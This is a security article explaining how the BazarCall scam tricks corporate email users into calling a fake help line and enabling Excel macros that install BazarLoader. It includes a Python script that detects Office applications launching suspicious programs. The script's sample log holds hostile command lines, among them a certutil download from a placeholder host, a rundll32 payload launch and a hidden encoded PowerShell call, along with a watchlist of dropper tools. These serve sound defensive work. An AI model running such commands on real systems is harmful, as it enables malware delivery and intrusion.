BazarLoader is a vicious piece of malware that, once it is running on a machine, can covertly launch other programs, disguising them as ordinary applications such as Notepad. It can also clean up after itself, deleting its own file from disk and making a swift exit. Now crooks are targeting corporate and institutional email addresses to trick recipients into phoning a fake “help” center, where a live operator gives them step-by-step instructions for infecting their own computers.
Here’s how it works:
First, the target receives a phishing email claiming that a free trial is about to end. The email is dressed up as a notice about a trial, subscription, or financial service, appears to come from a legitimate company, and includes a website, a phone number, and a unique customer ID. The recipient is prompted to call the phone number for “customer service”. This gives the scammer several advantages. First, only people who fell for the email bother to call, so callers are more likely to go along with the rest of the scam. Second, because the target initiated the call, they are lulled into a false sense of security: the interaction feels like it is on their terms, not the scammer’s. Third, the target is talking to a live person who can answer questions and adjust the pitch in real time.
On the call, the crook directs the target to enter the customer ID on the associated website, which adds another layer of apparent legitimacy. The site then prompts the victim to download an Excel document and click Enable Content. That click enables the document’s macros, which download and execute BazarLoader on the victim’s device. Note that no software vulnerability is exploited anywhere in this chain: every step depends on the victim being talked into doing it.
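From a defender’s side, the weak point of this chain is the last step: Excel should almost never spawn a command shell, a script host, or a download utility. The following Python script is an added example, not code from the original article or from any vendor, that flags Office applications spawning such children. The log format (one key="value" line per process creation, loosely modelled on Sysmon Event ID 1 fields), the watchlists of suspicious and benign children, and the sample log lines are all constructed for the example; tune them to your own telemetry.

```python
"""Flag Office applications spawning suspicious child processes.

Added example for detecting a macro-enabled document that downloads and runs
a payload. Log format, watchlists and sample lines are assumptions made up
for this demonstration, not data from any real incident.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Office hosts that should rarely spawn scripting or download utilities.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Children commonly used by macro droppers to fetch and run a payload
# (assumed watchlist; extend it for your environment).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}

# Helpers Office launches legitimately (assumed allowlist to suppress noise).
BENIGN_CHILDREN = {"splwow64.exe", "dw20.exe"}

# Matches key="value" pairs; values may contain spaces and backslashes.
KV_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass(frozen=True)
class ProcessEvent:
    ts: str
    user: str
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> ProcessEvent | None:
    """Parse one key="value" log line; return None if a field is missing."""
    fields = dict(KV_RE.findall(line))
    try:
        return ProcessEvent(fields["ts"], fields["user"], fields["parent"],
                            fields["image"], fields["cmd"])
    except KeyError:
        return None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> str | None:
    """Return a reason string if the event matches the Office-child pattern."""
    parent = basename(ev.parent_image)
    child = basename(ev.image)
    if parent not in OFFICE_PARENTS or child in BENIGN_CHILDREN:
        return None
    if child in SUSPICIOUS_CHILDREN:
        return f"{parent} spawned {child}"
    # Unlisted child, but a URL on the command line still smells like a cradle.
    if "http://" in ev.command_line.lower() or "https://" in ev.command_line.lower():
        return f"{parent} spawned {child} with a URL on the command line"
    return None


def find_alerts(lines) -> list[tuple[ProcessEvent, str]]:
    """Run the detection over an iterable of log lines."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        reason = classify(ev)
        if reason:
            alerts.append((ev, reason))
    return alerts


# Constructed sample log: lines 1, 4 and 5 should alert; 2 (benign helper)
# and 3 (non-Office parent) should not.
SAMPLE_LOG = """\
ts="2021-04-26T10:12:03Z" user="CORP\\jdoe" parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" image="C:\\Windows\\System32\\cmd.exe" cmd="cmd.exe /c certutil -urlcache -split -f http://update.example.invalid/x.dll C:\\Users\\jdoe\\AppData\\Local\\Temp\\x.dll"
ts="2021-04-26T10:12:04Z" user="CORP\\jdoe" parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" image="C:\\Windows\\splwow64.exe" cmd="C:\\Windows\\splwow64.exe 12288"
ts="2021-04-26T10:15:41Z" user="CORP\\asmith" parent="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmd="powershell.exe"
ts="2021-04-26T10:20:09Z" user="CORP\\jdoe" parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" image="C:\\Windows\\System32\\rundll32.exe" cmd="rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\x.dll,DllRegisterServer"
ts="2021-04-26T10:22:57Z" user="CORP\\bwong" parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"
"""

if __name__ == "__main__":
    for ev, reason in find_alerts(SAMPLE_LOG.splitlines()):
        print(f"{ev.ts} {ev.user}: {reason}: {ev.command_line}")
```

Run on the constructed sample, the script reports the three macro-style launches and stays quiet on the print-spooler helper and on PowerShell started from Explorer. The same parent/child logic maps directly onto a Sysmon or EDR query in production; the allowlist is where most of the tuning effort goes.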
Because corporate and institutional email addresses are the primary targets of these attacks, security researchers theorize that the goal is to rent access to infected machines, and the networks they sit on, to ransomware syndicates. If you have a corporate or institutional email account, be on the lookout for the BazarCaller scam. Even if the crook gets as far as having you on the phone, hang up at the first red flag: no legitimate cancellation process requires you to download a spreadsheet and enable its macros.